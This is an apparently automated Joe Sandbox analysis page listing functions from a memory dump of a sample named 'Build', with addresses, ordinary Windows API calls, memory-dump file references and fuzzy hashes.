Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: dafbfe446def65c4e1631da2c599340c32d9b2156c44ce23467515ac90f92003
Instruction ID: 39e948fdb3d5c90a30ffaaf3058ccffee59b5c136feea81ada206e788e0dbeff
Opcode Fuzzy Hash: dafbfe446def65c4e1631da2c599340c32d9b2156c44ce23467515ac90f92003
Instruction Fuzzy Hash: 5E2106B1E407159BDB2AFFB4CC4565A76ACBB04314F45417AE909EF281E7B49900C798

Function 0038D2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0038D348

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: f99ca826e64a6f1d4116e7f1c0a44608a7336bd038ef9ecea5afdb0dde1210c5
Instruction ID: faf4e90bc3c7c1e0b748743aec83988272e1e107b94b1685d971f02e7a3a3f9d
Opcode Fuzzy Hash: f99ca826e64a6f1d4116e7f1c0a44608a7336bd038ef9ecea5afdb0dde1210c5
Instruction Fuzzy Hash: 9911CD3B6007259B9F27BE2DEC4095B7399AB8536071742A0FD15AB294DB71DC0187D2

Function 0036AB81 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0036AB88

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 1eb4b2487efedf4bb971545da0ca5a17e9dba3097042e53f986b7d1987919833
Instruction ID: 09d0291bca27733427676031488588d338615691d004eb67ae3eff14dd3a2404
Opcode Fuzzy Hash: 1eb4b2487efedf4bb971545da0ca5a17e9dba3097042e53f986b7d1987919833
Instruction Fuzzy Hash: B0018836D00A295BCF27EF64C892DAE7375AF45740B05C519FD11BF245DB358C018B91

Function 0038BC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2c69e23c3df070b5b9c2fe442cfa2bc065e03650a2f424f1d834cfe0095a267c
Instruction ID: aec115e4850156f639eedd612b49f1b9b8ffd7974e45736aca8b3683f272cb5e
Opcode Fuzzy Hash: 2c69e23c3df070b5b9c2fe442cfa2bc065e03650a2f424f1d834cfe0095a267c
Instruction Fuzzy Hash: A6E06D3524172397EB3337659C12B5BFE6C9F517A0F1A01A2AC06AA5A2CF65DC0183E5

Function 0036AFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,0036AF75,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036AFEB

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f92d1982c5f9e864dec80611fc94b673afdd7ff0fee22f3ca7e8c8344ca2e9d5
Instruction ID: 14f9b1ee7bcedfa525f3428fd60b914ffed12f07e10ad807a2a01b88ea6ccb9c
Opcode Fuzzy Hash: f92d1982c5f9e864dec80611fc94b673afdd7ff0fee22f3ca7e8c8344ca2e9d5
Instruction Fuzzy Hash: B5F0E970086B028FDB328B20C848793B7E4AB12325F049B1EC0F3475E4D36165CDDA52

Function 0036C37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0036C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000), ref: 0036C4E6
Part of subcall function 0036C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?), ref: 0036C516
Part of subcall function 0036C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A), ref: 0036C522

FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0036C3A5

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 03d08bb11915febf976adacdbe6493ca3611551ffe070a9b9cf4b67c87e4b33c
Instruction ID: 4857c02aa2cc583264d2d6f6d5e21756bb76e9dd5b25b68338df12c8b1f4939a
Opcode Fuzzy Hash: 03d08bb11915febf976adacdbe6493ca3611551ffe070a9b9cf4b67c87e4b33c
Instruction Fuzzy Hash: 26F0E239008380AACA232BB448017D6BB905F26332F10DA0AF1FD5629AC6B52084CB32

Function 00371421 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00371445

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction ID: 02716d9b525a00c568ad1eaf2b91eb5e21fcfc54c6ed66b85275d423dbb10c54
Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction Fuzzy Hash: 65E0483210014059D332AB1DD845DBFA7B99FC1720F15C41DF5988B181CB799881CB60

Function 00372EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00372F19

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 06158af07c9537c4f0ae377553083fcc00b0027491f1590be45d7e3e981cc887
Instruction ID: 72e39cab70acdd44d9967f97268d5b612863901fa2158b1bee48fccf280d5098
Opcode Fuzzy Hash: 06158af07c9537c4f0ae377553083fcc00b0027491f1590be45d7e3e981cc887
Instruction Fuzzy Hash: 17D05B1174915155D637773568467FE191A9FC3315F498076F00D6F1C3CB9E0C4292E2

Function 0037C5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0037C5BC

Part of subcall function 0037C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037C36E

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction ID: 3a1e906aa3f061c1d16105cfd4b3a1774e5b7600442ab87a3eb187c3128d7aca
Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction Fuzzy Hash: 05D0A730220308B6DF532B21CC1297E7698DB01350F00C0297805D9140EEBADA50AA51

Function 0038017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 003801A4

Part of subcall function 0037D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
Part of subcall function 0037D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
Part of subcall function 0037D864: IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
Part of subcall function 0037D864: TranslateMessage.USER32(?), ref: 0037D8A8
Part of subcall function 0037D864: DispatchMessageW.USER32(?), ref: 0037D8B2

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 163f49bb2db22dfb1f79436f7a589d0ea4a97a73b00377f03c9c015cac320f35
Instruction ID: 7d747897494c5e31af837747be24edc5fc70816291a7d18fb830f548267585c1
Opcode Fuzzy Hash: 163f49bb2db22dfb1f79436f7a589d0ea4a97a73b00377f03c9c015cac320f35
Instruction Fuzzy Hash: EFD09E31158300BAD6132B52CD06F1A7AA6BB9DB09F404554B288740F286629D21AB16

Function 00380A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00380AC0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: af10bab218caecbc90520e11e262a4ac6612b9041c565f3eeefafdd2aeca39ab
Instruction ID: 638f1ec6958c36609ddb4e2ffc059bc77803888d910444d86a5b9a1975df2c94
Opcode Fuzzy Hash: af10bab218caecbc90520e11e262a4ac6612b9041c565f3eeefafdd2aeca39ab
Instruction Fuzzy Hash: CED0C970501B049DD29FBB689C8EB6422A8B319708F950485B506DA094C7A5BCC88705

Function 003711EB Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 003711F5

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3dd1aef9214c3e682463583cad30b66182c8b9e63c76bf8652036d19c77b5f4b
Instruction ID: 67425673890de973854f591529cf301a58249be73a568216418e2c96abd8e2e2
Opcode Fuzzy Hash: 3dd1aef9214c3e682463583cad30b66182c8b9e63c76bf8652036d19c77b5f4b
Instruction Fuzzy Hash: 5ED0C971415211CFD3718F38E404741BBE4AF08310B11882ED0C9C2220E6755880CF40

Function 0036B288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,0036B18A,?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B294

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 583da34a9ccc0e1218348285efa8f93accccc1a50433072bfc2c808c1dcdf3ce
Instruction ID: 91f1d6877fd79fa05cd884e5a32110f1f8e32ec74789fe7703c12f9de42bd5c1
Opcode Fuzzy Hash: 583da34a9ccc0e1218348285efa8f93accccc1a50433072bfc2c808c1dcdf3ce
Instruction Fuzzy Hash: 90C0123400010495CE325624985545CB351AE523667B5CA94C028C50A9C3238CC7EE00

Function 0038067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60270f70d8e7dfa616ce20955f6c2f0001bd27ef5c3efd42a04d6fe3b0d19d27
Instruction ID: 1940b80a718a9d43aeb14da7291f3e8f090599857b66191c19e27eee8212a3d0
Opcode Fuzzy Hash: 60270f70d8e7dfa616ce20955f6c2f0001bd27ef5c3efd42a04d6fe3b0d19d27
Instruction Fuzzy Hash: 6DB0128A35C202BD325F31545C02C3F010CD0C0B10332857EF404C4040B4445C4C0631

Function 003806B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d165c1381d0a63b369b3c7c9f6c9e170d5e1041c9a241bde47cac97c4ba141db
Instruction ID: ab271be2d57119927ad921678f5267a0ec93a8d770cef3dc357177cf581e23cb
Opcode Fuzzy Hash: d165c1381d0a63b369b3c7c9f6c9e170d5e1041c9a241bde47cac97c4ba141db
Instruction Fuzzy Hash: 41B09289258302AC369B61595C42D3B011CC0C0B10321856AF408C4140A4405C884631

Function 003806AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f3539d9da7c431c45051ba5cda2f386be0a931b305d0bac3ae0d39dffcfea562
Instruction ID: 5f5be77476aaa0d7f5bc005d97448e49dd6cba3543ccf9a839bcae087d602878
Opcode Fuzzy Hash: f3539d9da7c431c45051ba5cda2f386be0a931b305d0bac3ae0d39dffcfea562
Instruction Fuzzy Hash: EBB0128D35C302AC329F71585C42D3F010CC0C0B10331C47EF808C4140F4406C4C0731

Function 003806A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e26f980d7477805d35ec6c9904d7b78853bf8818ca011620c92fd432201e5db1
Instruction ID: ee27d760fcbde31f42e824cf38204338053d2486f3243950071d0d93b039c47e
Opcode Fuzzy Hash: e26f980d7477805d35ec6c9904d7b78853bf8818ca011620c92fd432201e5db1
Instruction Fuzzy Hash: 49B0128936C302AC328F71589C02D7F011CD0C0B10331857FF408C4040F4405C4C0731

Function 00380697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
